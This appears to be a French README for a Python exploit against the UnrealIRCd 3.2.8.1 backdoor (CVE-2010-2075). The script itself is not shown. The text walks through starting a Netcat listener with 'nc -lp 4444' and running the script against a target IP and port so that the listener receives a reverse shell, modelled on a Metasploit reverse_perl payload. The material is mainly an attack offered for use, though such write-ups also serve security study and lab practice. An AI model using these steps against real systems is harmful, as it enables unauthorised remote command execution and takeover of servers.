
Exploit Python pour la porte dérobée UnrealIRCd 3.2.8.1 (CVE-2010-2075) fournissant un shell inversé via un écouteur Netcat.
Exploit d'exécution de commande par backdoor UnrealIRCd 3.2.8.1 en Python 3 (CVE-2010-2075).
UnrealIRCd version 3.2.8.1 contient un cheval de Troie qui permet à des attaquants distants d'exécuter des commandes arbitraires (CVE-2010-2075).
Je me suis référé au payload Metasploit payload/cmd/unix/reverse_perl pour réaliser ce script.
Démarrez un écouteur Netcat sur l'hôte d'écoute :
nc -lp 4444
Exécutez le script en fournissant les arguments positionnels suivants :
python3 script.py <target> <tport> <listener> <lport>
<target> Adresse IP de l'hôte cible.<tport> Numéro de port de l'hôte cible.<listener> Adresse IP de l'hôte d'écoute.<lport> Numéro de port de l'hôte d'écoute.Configurez un écouteur Netcat sur votre machine locale :
nc -lp 4444
Exécutez le script contre une machine cible à l'adresse 192.168.1.3 port TCP 6697 :
python3 script.py 192.168.1.3 6697 192.168.1.2 4444
Attendez une minute et l'écouteur Netcat devrait recevoir un reverse shell.